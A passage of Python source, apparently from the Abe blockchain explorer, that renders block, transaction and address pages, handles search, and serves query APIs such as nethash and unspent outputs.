for row in rows:
(hash, height, nTime, num_tx, nBits, value_out,
seconds, ss, satoshis, destroyed, total_ss) = row
nTime = int(nTime)
value_out = int(value_out)
seconds = int(seconds)
satoshis = int(satoshis)
ss = int(ss)
total_ss = int(total_ss)
if satoshis == 0:
avg_age = ' '
else:
avg_age = '%5g' % (ss / satoshis / 86400.0)
if total_ss <= 0:
percent_destroyed = ' '
else:
percent_destroyed = '%5g%%' % (100.0 - (100.0 * ss / total_ss))
body += [
'<tr><td><a href="', page['dotdot'], 'block/',
abe.store.hashout_hex(hash),
'">', height, '</a>'
'</td><td>', format_time(int(nTime)),
'</td><td>', num_tx,
'</td><td>', format_satoshis(value_out, chain),
'</td><td>', util.calculate_difficulty(int(nBits)),
'</td><td>', format_satoshis(satoshis, chain),
'</td><td>', avg_age,
'</td><td>', '%5g' % (seconds / 86400.0),
'</td><td>', percent_destroyed,
['</td><td>', '%8g' % ss,
'</td><td>', '%8g' % total_ss] if extra else '',
'</td></tr>\n']
body += ['</table>\n<p>', nav, '</p>\n']
def _show_block(abe, page, dotdotblock, chain, **kwargs):
body = page['body']
try:
b = abe.store.export_block(chain, **kwargs)
except DataStore.MalformedHash:
body += ['<p class="error">Not in correct format.</p>']
return
if b is None:
body += ['<p class="error">Block not found.</p>']
return
in_longest = False
for cc in b['chain_candidates']:
if chain is None:
chain = cc['chain']
if chain.id == cc['chain'].id:
in_longest = cc['in_longest']
if in_longest:
page['title'] = [escape(chain.name), ' ', b['height']]
page['h1'] = ['<a href="', page['dotdot'], 'chain/',
escape(chain.name), '?hi=', b['height'], '">',
escape(chain.name), '</a> ', b['height']]
else:
page['title'] = ['Block ', b['hash'][:4], '...', b['hash'][-10:]]
body += abe.short_link(page, 'b/' + block_shortlink(b['hash']))
is_stake_chain = chain.has_feature('nvc_proof_of_stake')
is_stake_block = is_stake_chain and b['is_proof_of_stake']
body += ['<p>']
if is_stake_chain:
body += [
'Proof of Stake' if is_stake_block else 'Proof of Work',
': ',
format_satoshis(b['generated'], chain), ' coins generated<br />\n']
body += ['Hash: ', b['hash'], '<br />\n']
if b['hashPrev'] is not None:
body += ['Previous Block: <a href="', dotdotblock,
b['hashPrev'], '">', b['hashPrev'], '</a><br />\n']
if b['next_block_hashes']:
body += ['Next Block: ']
for hash in b['next_block_hashes']:
body += ['<a href="', dotdotblock, hash, '">', hash, '</a><br />\n']
body += [
['Height: ', b['height'], '<br />\n']
if b['height'] is not None else '',
'Version: ', b['version'], '<br />\n',
'Transaction Merkle Root: ', b['hashMerkleRoot'], '<br />\n',
'Time: ', b['nTime'], ' (', format_time(b['nTime']), ')<br />\n',
'Difficulty: ', format_difficulty(util.calculate_difficulty(b['nBits'])),
' (Bits: %x)' % (b['nBits'],), '<br />\n',
['Cumulative Difficulty: ', format_difficulty(
util.work_to_difficulty(b['chain_work'])), '<br />\n']
if b['chain_work'] is not None else '',
'Nonce: ', b['nNonce'], '<br />\n',
'Transactions: ', len(b['transactions']), '<br />\n',
'Value out: ', format_satoshis(b['value_out'], chain), '<br />\n',
'Transaction Fees: ', format_satoshis(b['fees'], chain), '<br />\n',
['Average Coin Age: %6g' % (b['satoshi_seconds'] / 86400.0 / b['chain_satoshis'],),
' days<br />\n']
if b['chain_satoshis'] and (b['satoshi_seconds'] is not None) else '',
'' if b['satoshis_destroyed'] is None else
['Coin-days Destroyed: ',
format_satoshis(b['satoshis_destroyed'] / 86400.0, chain), '<br />\n'],
['Cumulative Coin-days Destroyed: %6g%%<br />\n' %
(100 * (1 - float(b['satoshi_seconds']) / b['chain_satoshi_seconds']),)]
if b['chain_satoshi_seconds'] else '',
['sat=',b['chain_satoshis'],';sec=',seconds,';ss=',b['satoshi_seconds'],
';total_ss=',b['chain_satoshi_seconds'],';destroyed=',b['satoshis_destroyed']]
if abe.debug else '',
'</p>\n']
body += ['<h3>Transactions</h3>\n']
body += ['<table style="margin-right: auto; margin-left: auto;"><tr><th>Transaction</th><th>Fee</th>'
'<th>Size (kB)</th><th>From (amount)</th><th>To (amount)</th>'
'</tr>\n']
for tx in b['transactions']:
body += ['<tr><td><a href="../tx/' + tx['hash'] + '">',
tx['hash'][:10], '...</a>'
'</td><td>', format_satoshis(tx['fees'], chain),
'</td><td>', tx['size'] / 1000.0,
'</td><td>']
if tx is b['transactions'][0]:
body += [
'POS ' if is_stake_block else '',
'Generation: ', format_satoshis(b['generated'], chain), ' + ',
format_satoshis(b['fees'], chain), ' total fees']
else:
for txin in tx['in']:
body += [abe.format_addresses(txin, page['dotdot'], chain), ': ',
format_satoshis(txin['value'], chain), '<br />']
body += ['</td><td>']
for txout in tx['out']:
if is_stake_block:
if tx is b['transactions'][0]:
assert txout['value'] == 0
assert len(tx['out']) == 1
body += [
format_satoshis(b['proof_of_stake_generated'], chain),
' included in the following transaction']
continue
if txout['value'] == 0:
continue
body += [abe.format_addresses(txout, page['dotdot'], chain), ': ',
format_satoshis(txout['value'], chain), '<br />']
body += ['</td></tr>\n']
body += '</table>\n'
def handle_block(abe, page):
block_hash = wsgiref.util.shift_path_info(page['env'])
if block_hash in (None, '') or page['env']['PATH_INFO'] != '':
raise PageNotFound()
block_hash = block_hash.lower() # Case-insensitive, BBE compatible
page['title'] = 'Block'
if not is_hash_prefix(block_hash):
page['body'] += ['<p class="error">Not a valid block hash.</p>']
return
abe._show_block(page, '', None, block_hash=block_hash)
def handle_tx(abe, page):
tx_hash = wsgiref.util.shift_path_info(page['env'])
if tx_hash in (None, '') or page['env']['PATH_INFO'] != '':
raise PageNotFound()
tx_hash = tx_hash.lower() # Case-insensitive, BBE compatible
page['title'] = ['Transaction ', tx_hash[:10], '...', tx_hash[-4:]]
body = page['body']
if not is_hash_prefix(tx_hash):
body += ['<p class="error">Not a valid transaction hash.</p>']
return
try:
# XXX Should pass chain to export_tx to help parse scripts.
tx = abe.store.export_tx(tx_hash = tx_hash, format = 'browser')
except DataStore.MalformedHash:
body += ['<p class="error">Not in correct format.</p>']
return
if tx is None:
body += ['<p class="error">Transaction not found.</p>']
return
return abe.show_tx(page, tx)
def show_tx(abe, page, tx):
body = page['body']
def row_to_html(row, this_ch, other_ch, no_link_text):
body = page['body']
body += [
'<tr>\n',
'<td><a name="', this_ch, row['pos'], '">', row['pos'],
'</a></td>\n<td>']
if row['o_hash'] is None:
body += [no_link_text]
else:
body += [
'<a href="', row['o_hash'], '#', other_ch, row['o_pos'],
'">', row['o_hash'][:10], '...:', row['o_pos'], '</a>']
body += [
'</td>\n',
'<td>', format_satoshis(row['value'], chain), '</td>\n',
'<td>', abe.format_addresses(row, '../', chain), '</td>\n']
if row['binscript'] is not None:
body += ['<td>', escape(decode_script(row['binscript'])), '</td>\n']
body += ['</tr>\n']
body += abe.short_link(page, 't/' + hexb58(tx['hash'][:14]))
body += ['<p>Hash: ', tx['hash'], '<br />\n']
chain = None
is_coinbase = None
for tx_cc in tx['chain_candidates']:
if chain is None:
chain = tx_cc['chain']
is_coinbase = (tx_cc['tx_pos'] == 0)
elif tx_cc['chain'].id != chain.id:
abe.log.warning('Transaction ' + tx['hash'] + ' in multiple chains: '
+ tx_cc['chain'].id + ', ' + chain.id)
blk_hash = tx_cc['block_hash']
body += [
'Appeared in <a href="../block/', blk_hash, '">',
escape(tx_cc['chain'].name), ' ',
tx_cc['block_height'] if tx_cc['in_longest'] else [blk_hash[:10], '...', blk_hash[-4:]],
'</a> (', format_time(tx_cc['block_nTime']), ')<br />\n']
if chain is None:
abe.log.warning('Assuming default chain for Transaction ' + tx['hash'])
chain = abe.get_default_chain()
body += [
'Number of inputs: ', len(tx['in']),
' (<a href="#inputs">Jump to inputs</a>)<br />\n',
'Total in: ', format_satoshis(tx['value_in'], chain), '<br />\n',
'Number of outputs: ', len(tx['out']),
' (<a href="#outputs">Jump to outputs</a>)<br />\n',
'Total out: ', format_satoshis(tx['value_out'], chain), '<br />\n',
'Size: ', tx['size'], ' bytes<br />\n',
'Fee: ', format_satoshis(0 if is_coinbase else
(tx['value_in'] and tx['value_out'] and
tx['value_in'] - tx['value_out']), chain),
'<br />\n',
'<a href="../rawtx/', tx['hash'], '">Raw transaction</a><br />\n']
body += ['</p>\n',
'<a name="inputs"><h3>Inputs</h3></a>\n<table style="margin-right: auto; margin-left: auto;">\n',
'<tr><th>Index</th><th>Previous output</th><th>Amount</th>',
'<th>From address</th>']
if abe.store.keep_scriptsig:
body += ['<th>ScriptSig</th>']
body += ['</tr>\n']
for txin in tx['in']:
row_to_html(txin, 'i', 'o',
'Generation' if is_coinbase else 'Unknown')
body += ['</table>\n',
'<a name="outputs"><h3>Outputs</h3></a>\n<table style="margin-right: auto; margin-left: auto;">\n',
'<tr><th>Index</th><th>Redeemed at input</th><th>Amount</th>',
'<th>To address</th><th>ScriptPubKey</th></tr>\n']
for txout in tx['out']:
row_to_html(txout, 'o', 'i', 'Not yet redeemed')
body += ['</table>\n']
def handle_rawtx(abe, page):
abe.do_raw(page, abe.do_rawtx)
def do_rawtx(abe, page, chain):
tx_hash = wsgiref.util.shift_path_info(page['env'])
if tx_hash in (None, '') or page['env']['PATH_INFO'] != '' \
or not is_hash_prefix(tx_hash):
return 'ERROR: Not in correct format' # BBE compatible
tx = abe.store.export_tx(tx_hash=tx_hash.lower())
if tx is None:
return 'ERROR: Transaction does not exist.' # BBE compatible
return json.dumps(tx, sort_keys=True, indent=2)
def handle_address(abe, page):
address = wsgiref.util.shift_path_info(page['env'])
if address in (None, '') or page['env']['PATH_INFO'] != '':
raise PageNotFound()
body = page['body']
page['title'] = 'Address ' + escape(address)
try:
history = abe.store.export_address_history(
address, chain=page['chain'], max_rows=abe.address_history_rows_max)
except DataStore.MalformedAddress:
page['status'] = '404 Not Found'
body += ['<p>Not a valid address.</p>']
return
if history is None:
body += ["<p>I'm sorry, this address has too many records"
" to display.</p>"]
return
binaddr = history['binaddr']
version = history['version']
chains = history['chains']
txpoints = history['txpoints']
balance = history['balance']
sent = history['sent']
received = history['received']
counts = history['counts']
if (not chains):
page['status'] = '404 Not Found'
body += ['<p>Address not seen on the network.</p>']
return
def format_amounts(amounts, link):
ret = []
for chain in chains:
if ret:
ret += [', ']
ret += [format_satoshis(amounts[chain.id], chain),
' ', escape(chain.code3)]
if link:
vers = chain.address_version
if page['chain'] is not None and version == page['chain'].script_addr_vers:
vers = chain.script_addr_vers or vers
other = util.hash_to_address(vers, binaddr)
if other != address:
ret[-1] = ['<a href="', page['dotdot'],
'address/', other,
'">', ret[-1], '</a>']
return ret
if abe.shortlink_type == "firstbits":
link = abe.store.get_firstbits(
address_version=version, db_pubkey_hash=abe.store.binin(binaddr),
chain_id = (page['chain'] and page['chain'].id))
if link:
link = link.replace('l', 'L')
else:
link = address
else:
link = address[0 : abe.shortlink_type]
body += abe.short_link(page, 'a/' + link)
body += ['<p>Balance: '] + format_amounts(balance, True)
if 'subbinaddr' in history:
chain = page['chain']
if chain is None:
for c in chains:
if c.script_addr_vers == version:
chain = c
break
if chain is None:
chain = chains[0]
body += ['<br />\nEscrow']
for subbinaddr in history['subbinaddr']:
body += [' ', hash_to_address_link(chain.address_version, subbinaddr, page['dotdot'], 10) ]
for chain in chains:
balance[chain.id] = 0 # Reset for history traversal.
body += ['<br />\n',
'Transactions in: ', counts[0], '<br />\n',
'Received: ', format_amounts(received, False), '<br />\n',
'Transactions out: ', counts[1], '<br />\n',
'Sent: ', format_amounts(sent, False), '<br />\n']
body += ['</p>\n'
'<h3>Transactions</h3>\n'
'<table style="margin-right: auto; margin-left: auto;" class="addrhist">\n<tr><th>Transaction</th><th>Block</th>'
'<th>Approx. Time</th><th>Amount</th><th>Balance</th>'
'<th>Currency</th></tr>\n']
for elt in txpoints:
chain = elt['chain']
type = elt['type']
if type == 'direct':
balance[chain.id] += elt['value']
body += ['<tr class="', type, '"><td class="tx"><a href="../tx/', elt['tx_hash'],
'#', 'i' if elt['is_out'] else 'o', elt['pos'],
'">', elt['tx_hash'][:10], '...</a>',
'</td><td class="block"><a href="../block/', elt['blk_hash'],
'">', elt['height'], '</a></td><td class="time">',
format_time(elt['nTime']), '</td><td class="amount">']
if elt['value'] < 0:
value = '(' + format_satoshis(-elt['value'], chain) + ')'
else:
value = format_satoshis(elt['value'], chain)
if 'binaddr' in elt:
value = hash_to_address_link(chain.script_addr_vers, elt['binaddr'], page['dotdot'], text=value)
body += [value, '</td><td class="balance">',
format_satoshis(balance[chain.id], chain),
'</td><td class="currency">', escape(chain.code3),
'</td></tr>\n']
body += ['</table>\n']
def search_form(abe, page):
q = (page['params'].get('q') or [''])[0]
return [
'<p>Search by address, block number or hash, transaction or'
' public key hash, or chain name:</p>\n'
'<form action="', page['dotdot'], 'search"><p>\n'
'<input name="q" size="64" value="', escape(q), '" />'
'<button type="submit">Search</button>\n'
'<br />Address or hash search requires at least the first ',
HASH_PREFIX_MIN, ' characters.</p></form>\n']
def handle_search(abe, page):
page['title'] = 'Search'
q = (page['params'].get('q') or [''])[0]
if q == '':
page['body'] = [
'<p>Please enter search terms.</p>\n', abe.search_form(page)]
return
found = []
if HEIGHT_RE.match(q): found += abe.search_number(int(q))
        if util.possible_address(q): found += abe.search_address(q)
        elif ADDR_PREFIX_RE.match(q): found += abe.search_address_prefix(q)
if is_hash_prefix(q): found += abe.search_hash_prefix(q)
abe.show_search_results(page, found)
def show_search_results(abe, page, found):
if not found:
page['body'] = [
'<p>No results found.</p>\n', abe.search_form(page)]
return
if len(found) == 1:
# Undo shift_path_info.
sn = posixpath.dirname(page['env']['SCRIPT_NAME'])
if sn == '/': sn = ''
page['env']['SCRIPT_NAME'] = sn
page['env']['PATH_INFO'] = '/' + page['dotdot'] + found[0]['uri']
            del page['env']['QUERY_STRING']
raise Redirect()
body = page['body']
body += ['<h3>Search Results</h3>\n<ul>\n']
for result in found:
body += [
'<li><a href="', page['dotdot'], escape(result['uri']), '">',
escape(result['name']), '</a></li>\n']
body += ['</ul>\n']
def search_number(abe, n):
def process(row):
(chain_name, dbhash, in_longest) = row
hexhash = abe.store.hashout_hex(dbhash)
if in_longest == 1:
name = str(n)
else:
name = hexhash
return {
'name': chain_name + ' ' + name,
'uri': 'block/' + hexhash,
}
return map(process, abe.store.selectall("""
SELECT c.chain_name, b.block_hash, cc.in_longest
FROM chain c
JOIN chain_candidate cc ON (cc.chain_id = c.chain_id)
JOIN block b ON (b.block_id = cc.block_id)
WHERE cc.block_height = ?
ORDER BY c.chain_name, cc.in_longest DESC
""", (n,)))
def search_hash_prefix(abe, q, types = ('tx', 'block', 'pubkey')):
q = q.lower()
ret = []
for t in types:
def process(row):
if t == 'tx': name = 'Transaction'
elif t == 'block': name = 'Block'
else:
# XXX Use Bitcoin address version until we implement
# /pubkey/... for this to link to.
return abe._found_address(
util.hash_to_address('\0', abe.store.binout(row[0])))
hash = abe.store.hashout_hex(row[0])
return {
'name': name + ' ' + hash,
'uri': t + '/' + hash,
}
if t == 'pubkey':
if len(q) > 40:
continue
lo = abe.store.binin_hex(q + '0' * (40 - len(q)))
hi = abe.store.binin_hex(q + 'f' * (40 - len(q)))
else:
lo = abe.store.hashin_hex(q + '0' * (64 - len(q)))
hi = abe.store.hashin_hex(q + 'f' * (64 - len(q)))
ret += map(process, abe.store.selectall(
"SELECT " + t + "_hash FROM " + t + " WHERE " + t +
# XXX hardcoded limit.
"_hash BETWEEN ? AND ? LIMIT 100",
(lo, hi)))
return ret
def _found_address(abe, address):
return { 'name': 'Address ' + address, 'uri': 'address/' + address }
def search_address(abe, address):
try:
binaddr = base58.bc_address_to_hash_160(address)
except Exception:
return abe.search_address_prefix(address)
return [abe._found_address(address)]
def search_address_prefix(abe, ap):
ret = []
ones = 0
for c in ap:
if c != '1':
break
ones += 1
all_ones = (ones == len(ap))
minlen = max(len(ap), 24)
l = max(35, len(ap)) # XXX Increase "35" to support multibyte
# address versions.
al = ap + ('1' * (l - len(ap)))
ah = ap + ('z' * (l - len(ap)))
def incr_str(s):
for i in range(len(s)-1, -1, -1):
if s[i] != '\xff':
return s[:i] + chr(ord(s[i])+1) + ('\0' * (len(s) - i - 1))
return '\1' + ('\0' * len(s))
def process(row):
hash = abe.store.binout(row[0])
address = util.hash_to_address(vl, hash)
if address.startswith(ap):
v = vl
else:
if vh != vl:
address = util.hash_to_address(vh, hash)
if not address.startswith(ap):
return None
v = vh
if abe.is_address_version(v):
return abe._found_address(address)
while l >= minlen:
vl, hl = util.decode_address(al)
vh, hh = util.decode_address(ah)
if ones:
if not all_ones and \
util.hash_to_address('\0', hh)[ones:][:1] == '1':
break
elif vh == '\0':
break
elif vh != vl and vh != incr_str(vl):
continue
if hl <= hh:
neg = ""
else:
neg = " NOT"
hl, hh = hh, hl
bl = abe.store.binin(hl)
bh = abe.store.binin(hh)
ret += filter(None, map(process, abe.store.selectall(
"SELECT pubkey_hash FROM pubkey WHERE pubkey_hash" +
# XXX hardcoded limit.
neg + " BETWEEN ? AND ? LIMIT 100", (bl, bh))))
l -= 1
al = al[:-1]
ah = ah[:-1]
return ret
def search_general(abe, q):
"""Search for something that is not an address, hash, or block number.
Currently, this is limited to chain names and currency codes."""
def process(row):
(name, code3) = row
return { 'name': name + ' (' + code3 + ')',
'uri': 'chain/' + str(name) }
ret = map(process, abe.store.selectall("""
SELECT chain_name, chain_code3
FROM chain
WHERE UPPER(chain_name) LIKE '%' || ? || '%'
OR UPPER(chain_code3) LIKE '%' || ? || '%'
""", (q.upper(), q.upper())))
return ret
def handle_t(abe, page):
abe.show_search_results(
page,
abe.search_hash_prefix(
b58hex(wsgiref.util.shift_path_info(page['env'])),
('tx',)))
def handle_b(abe, page):
if page.get('chain') is not None:
chain = page['chain']
height = wsgiref.util.shift_path_info(page['env'])
try:
height = int(height)
except Exception:
raise PageNotFound()
if height < 0 or page['env']['PATH_INFO'] != '':
raise PageNotFound()
cmd = wsgiref.util.shift_path_info(page['env'])
if cmd is not None:
raise PageNotFound() # XXX want to support /a/...
page['title'] = [escape(chain.name), ' ', height]
abe._show_block(page, page['dotdot'] + 'block/', chain, block_number=height)
return
abe.show_search_results(
page,
abe.search_hash_prefix(
shortlink_block(wsgiref.util.shift_path_info(page['env'])),
('block',)))
def handle_a(abe, page):
arg = wsgiref.util.shift_path_info(page['env'])
if abe.shortlink_type == "firstbits":
addrs = map(
abe._found_address,
abe.store.firstbits_to_addresses(
arg.lower(),
chain_id = page['chain'] and page['chain'].id))
else:
addrs = abe.search_address_prefix(arg)
abe.show_search_results(page, addrs)
def handle_unspent(abe, page):
abe.do_raw(page, abe.do_unspent)
def do_unspent(abe, page, chain):
addrs = wsgiref.util.shift_path_info(page['env'])
if addrs is None:
addrs = []
else:
            addrs = addrs.split("|")
if len(addrs) < 1 or len(addrs) > MAX_UNSPENT_ADDRESSES:
return 'Number of addresses must be between 1 and ' + \
str(MAX_UNSPENT_ADDRESSES)
if chain:
chain_id = chain.id
bind = [chain_id]
else:
chain_id = None
bind = []
hashes = []
good_addrs = []
for address in addrs:
try:
hashes.append(abe.store.binin(
base58.bc_address_to_hash_160(address)))
good_addrs.append(address)
except Exception:
pass
addrs = good_addrs
bind += hashes
if len(hashes) == 0: # Address(es) are invalid.
return 'Error getting unspent outputs' # blockchain.info compatible
placeholders = "?" + (",?" * (len(hashes)-1))
max_rows = abe.address_history_rows_max
if max_rows >= 0:
bind += [max_rows + 1]
spent = set()
for txout_id, spent_chain_id in abe.store.selectall("""
SELECT txin.txout_id, cc.chain_id
FROM chain_candidate cc
JOIN block_tx ON (block_tx.block_id = cc.block_id)
JOIN txin ON (txin.tx_id = block_tx.tx_id)
JOIN txout prevout ON (txin.txout_id = prevout.txout_id)
JOIN pubkey ON (pubkey.pubkey_id = prevout.pubkey_id)
WHERE cc.in_longest = 1""" + ("" if chain_id is None else """
AND cc.chain_id = ?""") + """
AND pubkey.pubkey_hash IN (""" + placeholders + """)""" + (
"" if max_rows < 0 else """
LIMIT ?"""), bind):
spent.add((int(txout_id), int(spent_chain_id)))
abe.log.debug('spent: %s', spent)
received_rows = abe.store.selectall("""
SELECT
txout.txout_id,
cc.chain_id,
tx.tx_hash,
txout.txout_pos,
txout.txout_scriptPubKey,
txout.txout_value,
cc.block_height
FROM chain_candidate cc
JOIN block_tx ON (block_tx.block_id = cc.block_id)
JOIN tx ON (tx.tx_id = block_tx.tx_id)
JOIN txout ON (txout.tx_id = tx.tx_id)
JOIN pubkey ON (pubkey.pubkey_id = txout.pubkey_id)
WHERE cc.in_longest = 1""" + ("" if chain_id is None else """
AND cc.chain_id = ?""") + """
AND pubkey.pubkey_hash IN (""" + placeholders + """)""" + (
"" if max_rows < 0 else """
ORDER BY cc.block_height,
block_tx.tx_pos,
txout.txout_pos
LIMIT ?"""), bind)
if max_rows >= 0 and len(received_rows) > max_rows:
return "ERROR: too many records to process"
rows = []
for row in received_rows:
key = (int(row[0]), int(row[1]))
if key in spent:
continue
rows.append(row[2:])
if len(rows) == 0:
return 'No free outputs to spend [' + '|'.join(addrs) + ']'
out = []
for row in rows:
tx_hash, out_pos, script, value, height = row
tx_hash = abe.store.hashout_hex(tx_hash)
out_pos = None if out_pos is None else int(out_pos)
script = abe.store.binout_hex(script)
value = None if value is None else int(value)
height = None if height is None else int(height)
out.append({
'tx_hash': tx_hash,
'tx_output_n': out_pos,
'script': script,
'value': value,
'value_hex': None if value is None else "%x" % value,
'block_number': height})
return json.dumps({ 'unspent_outputs': out }, sort_keys=True, indent=2)
def do_raw(abe, page, func):
page['content_type'] = 'text/plain'
page['template'] = '%(body)s'
page['body'] = func(page, page['chain'])
def handle_q(abe, page):
cmd = wsgiref.util.shift_path_info(page['env'])
if cmd is None:
return abe.q(page)
func = getattr(abe, 'q_' + cmd, None)
if func is None:
raise PageNotFound()
abe.do_raw(page, func)
if page['content_type'] == 'text/plain':
jsonp = page['params'].get('jsonp', [None])[0]
fmt = page['params'].get('format', ["jsonp" if jsonp else "csv"])[0]
if fmt in ("json", "jsonp"):
page['body'] = json.dumps([page['body']])
if fmt == "jsonp":
page['body'] = (jsonp or "jsonp") + "(" + page['body'] + ")"
page['content_type'] = 'application/javascript'
else:
page['content_type'] = 'application/json'
def q(abe, page):
page['body'] = ['<p>Supported APIs:</p>\n<ul>\n']
for name in dir(abe):
if not name.startswith("q_"):
continue
cmd = name[2:]
page['body'] += ['<li><a href="q/', cmd, '">', cmd, '</a>']
val = getattr(abe, name)
if val.__doc__ is not None:
page['body'] += [' - ', escape(val.__doc__)]
page['body'] += ['</li>\n']
page['body'] += ['</ul>\n']
def get_max_block_height(abe, chain):
# "getblockcount" traditionally returns max(block_height),
# which is one less than the actual block count.
return abe.store.get_block_number(chain.id)
def q_getblockcount(abe, page, chain):
"""shows the current block number."""
if chain is None:
return 'Shows the greatest block height in CHAIN.\n' \
'/chain/CHAIN/q/getblockcount\n'
return abe.get_max_block_height(chain)
def q_getdifficulty(abe, page, chain):
"""shows the last solved block's difficulty."""
if chain is None:
return 'Shows the difficulty of the last block in CHAIN.\n' \
'/chain/CHAIN/q/getdifficulty\n'
target = abe.store.get_target(chain.id)
return "" if target is None else util.target_to_difficulty(target)
def q_translate_address(abe, page, chain):
"""shows the address in a given chain with a given address's hash."""
addr = wsgiref.util.shift_path_info(page['env'])
if chain is None or addr is None:
return 'Translates ADDRESS for use in CHAIN.\n' \
'/chain/CHAIN/q/translate_address/ADDRESS\n'
version, hash = util.decode_check_address(addr)
if hash is None:
return addr + " (INVALID ADDRESS)"
return util.hash_to_address(chain.address_version, hash)
def q_decode_address(abe, page, chain):
"""shows the version prefix and hash encoded in an address."""
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return "Shows ADDRESS's version byte(s) and public key hash" \
' as hex strings separated by colon (":").\n' \
'/q/decode_address/ADDRESS\n'
# XXX error check?
version, hash = util.decode_address(addr)
ret = version.encode('hex') + ":" + hash.encode('hex')
if util.hash_to_address(version, hash) != addr:
ret = "INVALID(" + ret + ")"
return ret
def q_addresstohash(abe, page, chain):
"""shows the public key hash encoded in an address."""
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return 'Shows the 160-bit hash encoded in ADDRESS.\n' \
'For BBE compatibility, the address is not checked for' \
' validity. See also /q/decode_address.\n' \
'/q/addresstohash/ADDRESS\n'
version, hash = util.decode_address(addr)
return hash.encode('hex').upper()
def q_hashtoaddress(abe, page, chain):
"""shows the address with the given version prefix and hash."""
arg1 = wsgiref.util.shift_path_info(page['env'])
arg2 = wsgiref.util.shift_path_info(page['env'])
if arg1 is None:
return \
'Converts a 160-bit hash and address version to an address.\n' \
'/q/hashtoaddress/HASH[/VERSION]\n'
if page['env']['PATH_INFO']:
return "ERROR: Too many arguments"
if arg2 is not None:
# BBE-compatible HASH/VERSION
version, hash = arg2, arg1
elif arg1.find(":") >= 0:
# VERSION:HASH as returned by /q/decode_address.
version, hash = arg1.split(":", 1)
elif chain:
version, hash = chain.address_version.encode('hex'), arg1
else:
# Default: Bitcoin address starting with "1".
version, hash = '00', arg1
try:
hash = hash.decode('hex')
version = version.decode('hex')
except Exception:
return 'ERROR: Arguments must be hexadecimal strings of even length'
return util.hash_to_address(version, hash)
def q_hashpubkey(abe, page, chain):
"""shows the 160-bit hash of the given public key."""
pubkey = wsgiref.util.shift_path_info(page['env'])
if pubkey is None:
return \
"Returns the 160-bit hash of PUBKEY.\n" \
"For example, the Bitcoin genesis block's output public key," \
" seen in its transaction output scriptPubKey, starts with\n" \
"04678afdb0fe..., and its hash is" \
" 62E907B15CBF27D5425399EBF6F0FB50EBB88F18, corresponding" \
" to address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa.\n" \
"/q/hashpubkey/PUBKEY\n"
try:
pubkey = pubkey.decode('hex')
except Exception:
return 'ERROR: invalid hexadecimal byte string.'
return util.pubkey_to_hash(pubkey).encode('hex').upper()
def q_checkaddress(abe, page, chain):
"""checks an address for validity."""
addr = wsgiref.util.shift_path_info(page['env'])
if addr is None:
return \
"Returns the version encoded in ADDRESS as a hex string.\n" \
"If ADDRESS is invalid, returns either X5, SZ, or CK for" \
" BBE compatibility.\n" \
"/q/checkaddress/ADDRESS\n"
if util.possible_address(addr):
version, hash = util.decode_address(addr)
if util.hash_to_address(version, hash) == addr:
return version.encode('hex').upper()
return 'CK'
if len(addr) >= 26:
return 'X5'
return 'SZ'
def q_nethash(abe, page, chain):
"""shows statistics about difficulty and network power."""
if chain is None:
return 'Shows statistics every INTERVAL blocks.\n' \
'Negative values count back from the last block.\n' \
'/chain/CHAIN/q/nethash[/INTERVAL[/START[/STOP]]]\n'
jsonp = page['params'].get('jsonp', [None])[0]
fmt = page['params'].get('format', ["jsonp" if jsonp else "csv"])[0]
interval = path_info_int(page, 144)
start = path_info_int(page, 0)
stop = path_info_int(page, None)
if stop == 0:
stop = None
if interval < 0 and start != 0:
return 'ERROR: Negative INTERVAL requires 0 START.'
if interval < 0 or start < 0 or (stop is not None and stop < 0):
count = abe.get_max_block_height(chain)
if start < 0:
start += count
if stop is not None and stop < 0:
stop += count
if interval < 0:
interval = -interval
start = count - (count / interval) * interval
# Select every INTERVAL blocks from START to STOP.
# Standard SQL lacks an "every Nth row" feature, so we
# provide it with the help of a table containing the integers.
# We don't need all integers, only as many as rows we want to
# fetch. We happen to have a table with the desired integers,
# namely chain_candidate; its block_height column covers the
# required range without duplicates if properly constrained.
# That is the story of the second JOIN.
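        # Illustrative sketch (not executed; names hypothetical): with
        # INTERVAL=3 and START=1, the join below keeps rows where some
        # longest-chain height i satisfies i * 3 + 1 = cc.block_height,
        # i.e. heights 1, 4, 7, ...  A standalone equivalent would be:
        #     SELECT b.* FROM block b
        #     JOIN ints ON (ints.n * 3 + 1 = b.block_height)
        # where "ints" stands in for the chain_candidate integer source.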
if stop is not None:
stop_ix = (stop - start) / interval
rows = abe.store.selectall("""
SELECT b.block_height,
b.block_nTime,
b.block_chain_work,
b.block_nBits
FROM block b
JOIN chain_candidate cc ON (cc.block_id = b.block_id)
JOIN chain_candidate ints ON (
ints.chain_id = cc.chain_id
AND ints.in_longest = 1
AND ints.block_height * ? + ? = cc.block_height)
WHERE cc.in_longest = 1
AND cc.chain_id = ?""" + (
"" if stop is None else """
AND ints.block_height <= ?""") + """
ORDER BY cc.block_height""",
(interval, start, chain.id)
if stop is None else
(interval, start, chain.id, stop_ix))
if fmt == "csv":
ret = NETHASH_HEADER
elif fmt in ("json", "jsonp"):
ret = []
elif fmt == "svg":
page['template'] = NETHASH_SVG_TEMPLATE
            page['template_vars']['block_time'] = 600  # XXX BTC-specific
ret = ""
else:
return "ERROR: unknown format: " + fmt
prev_nTime, prev_chain_work = 0, -1
for row in rows:
height, nTime, chain_work, nBits = row
nTime = float(nTime)
nBits = int(nBits)
target = util.calculate_target(nBits)
difficulty = util.target_to_difficulty(target)
work = util.target_to_work(target)
chain_work = abe.store.binout_int(chain_work) - work
if row is not rows[0] or fmt == "svg":
height = int(height)
interval_work = chain_work - prev_chain_work
avg_target = util.work_to_target(
interval_work / float(interval))
#if avg_target == target - 1:
# avg_target = target
interval_seconds = nTime - prev_nTime
if interval_seconds <= 0:
nethash = 'Infinity'
else:
nethash = "%.0f" % (interval_work / interval_seconds,)
if fmt == "csv":
ret += "%d,%d,%d,%d,%.3f,%d,%.0f,%s\n" % (
height, nTime, target, avg_target, difficulty, work,
interval_seconds / interval, nethash)
elif fmt in ("json", "jsonp"):
ret.append([
height, int(nTime), target, avg_target,
difficulty, work, chain_work, nethash])
elif fmt == "svg":
ret += '<abe:nethash t="%d" d="%d"' \
' w="%d"/>\n' % (nTime, work, interval_work)
prev_nTime, prev_chain_work = nTime, chain_work
if fmt == "csv":
return ret
elif fmt == "json":
page['content_type'] = 'application/json'
return json.dumps(ret)
elif fmt == "jsonp":
